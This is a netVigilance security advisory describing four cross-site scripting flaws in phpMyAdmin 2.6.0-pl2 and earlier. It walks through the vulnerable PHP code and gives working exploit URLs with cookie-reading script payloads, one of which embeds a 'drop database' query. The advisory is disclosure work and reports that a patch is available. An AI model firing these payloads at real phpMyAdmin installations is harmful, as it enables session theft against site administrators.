security advisories images security advisories images

netVigilance Security Advisory 5

Multiple XSS Vulnerabilities in phpMyAdmin 2.6.0-pl2 and prior


Description:
If the configuration parameter $cfg['PmaAbsoluteUri'] is not set in the config.inc.php file, the auto-detect process can be used to conduct XSS attacks.

The "Zero Rows" parameter from read_dump.php can be exploited to conduct XSS attacks, in case of a emtpy row answer from the MySQL database.

The confirm page form inputs can be used to conduct XSS attacks.

Summary:
phpMyAdmin phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW. There is multiple vulnerabilities in the current stable version of phpMyAdmin that may allow an attacker to conduct XSS attack.

Release Date:
November 18 2004

Severity:
Medium

SecureScout Testcase ID:
17927, 17928, 17929

Vulnerable Systems:
Latest stable version 2.6.0-pl2 and prior (minimum version for PmaAbsoluteUri XSS is 2.3)

Vulnerability Type:
XSS (Cross-Site Scripting) to force a web-site to display malicious contents to the target, by sending a specially crafted request to the web-site. The vulnerable web-site is not the target of attack but is used as a tool for the hacker in the attack of the victim.

Vendor Status:
The information has been provided to the phpMyAdmin Project Managers.
A new release 2.6.0-pl3 including all the patches is now available.

http://www.phpmyadmin.net/home_page/
http://www.phpmyadmin.net/home_page/relnotes.php?rel=0

Example:
I - Cross Site Scripting (PmaAbsoluteUri)
(Medium Risk)
From phpMyAdmin Documentation: "Starting with version 2.3.0, you can try to leave this parameter empty, because the program tries to auto-detect its proper value. Additional details are in the configuration file."

The algorithm computing this Absolute PATH is defined in the common.lib.php file and in case of a GET request, will have the following behavior.
File : libraries/common.lib.php

    992         // rabus: if php is in CGI mode, $PHP_SELF often contains the path to the CGI executable.         
    993         //   This is why we try to get the path from $REQUEST_URI or $PATH_INFO first.                    
    994         if (isset($REQUEST_URI)) {                                                                        
    995             $cfg['PmaAbsoluteUri']      .= substr($REQUEST_URI, 0, strrpos($REQUEST_URI, '/') + 1);       
    996         } else if (isset($PATH_INFO)) {                                                                   
    997             $cfg['PmaAbsoluteUri']      .= substr($PATH_INFO, 0, strrpos($PATH_INFO, '/') + 1);           
    998         } else {                                                                                          
    999             $cfg['PmaAbsoluteUri']      .= substr($PHP_SELF, 0, strrpos($PHP_SELF, '/') + 1);      
   1000         }                                                                                          


(from PHP Manual ==> strrpos -- Find position of last occurrence of a char in a string)

In the case of the following URL pattern :
'HTTP://[target]/[phpMyAdmin_directory]/[file]?[parameters]' $cfg['PmaAbsoluteUri'] will be equal to 'HTTP://[target]/[phpMyAdmin_directory]'

BUT if an additional '/' is added in the [parameters] block, like 'HTTP://[target]/[phpMyAdmin_directory]/[file]?[parameters1]/[parameters2]' then $cfg['PmaAbsoluteUri'] will be equal to 'HTTP://[target]/[phpMyAdmin_directory]/[file]?[parameters1]'

Now, if we look into the PHP file including this variable into the HTML Data whena GET /main.php is done, we obtain

file : libraries/header_meta_style.inc.php
     29 <?php                                                                       
     30 if (!empty($GLOBALS['cfg']['PmaAbsoluteUri'])) {                            
     31     echo '<base href="' . $GLOBALS['cfg']['PmaAbsoluteUri'] . '" />' . "
";
     32 }                                                                           
     33 ?>                                                                          

So, in case of a non defined $cfg['PmaAbsoluteUri'] in config.inc.php an attacker can conduct an XSS attack with the following URL.
Exploit example:

-- HTTP Request --

[parameters1] = "><script>alert(document.cookie)</script><

http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></

-- HTTP Request --

-- HTTP Reply --
...
<base href="http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></" />
...
--HTTP Reply --

                     -------------------------------------------

II - CrossSite Scripting (zero_rows)
(Medium Risk)

When performing a request to 'read_dump.php', a variable called 'zero_rows' can be used todisplay a specific message when the result from the MySQL server doesn't contain any row. This variable is not well sanatized, permitting to conduct XSS attack in case of 0 row answer from the Database.

This 0 row answer, can be triggered by a request like 'set @1=1'.

Exploit example:

-- HTTP Request --

http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=set%[email protected]=1&zero_rows=<script>alert(document.cookie)</script>
-- HTTP Request --

-- HTTP Reply--
...
<th bgcolor="#D3DCE3">
<b><script>alert(document.cookie)</script> (Query took 0.0009 sec)</b>
</th> ...
-- HTTP Reply --

                     -------------------------------------------

III - Cross Site Scripting (Confirm form)
(Medium Risk)

For some specific SQL statements a confirm page may be needed.
This confirm page (generated by sql.php) will embed a form which can be used to conduct XSS attack.

Exploit example:
(2 XSS will be triggereddue to XSS[1])

-- HTTP Request --

http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=drop%20database%20EXAMPLE&zero_rows="><script>alert(document.cookie)</script><input%20type=hidden%20value="/
-- HTTP Request --

-- HTTP Reply--
...
<base href="http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=drop%20database%20EXAMPLE&zero_rows="><script>alert(document.cookie)</script><input%20type=hidden%20value="/" />
...
<inputtype="hidden" name="sql_query" value="drop+database+EXAMPLE" />
<input type="hidden" name="zero_rows" value=""><script>alert(document.cookie)</script><input type=hidden value="/" /> ...
-- HTTP Reply --

                     -------------------------------------------

IV - Punctuation strings not sanatized before being displayed
(Low risk)

Strings in case of error during the parsing by phpMyAdmin will be displayed on STR line without being sanatized (compared to SQL line).

-- HTTP Request --

http://[target]/[phpMyAdmin_directory]/read_dump.php?sql_query=<></>
-- HTTP Request --

-- HTTP Reply --
...
ERROR: Unknown Punctuation String @ 1
STR: <></>
SQL: <></>
...
-- HTTP Reply --

Credits:
Cedric Cochin, Security Expert
Director of Product Integration, netVigilance, Inc. (www.netvigilance.com)
< cco [at] www.netvigilance.com >

back to Security Advisories
 

 

    Copyright©2004-2007,  netVigilance, Inc.   All rights reserved  •  Privacy Policy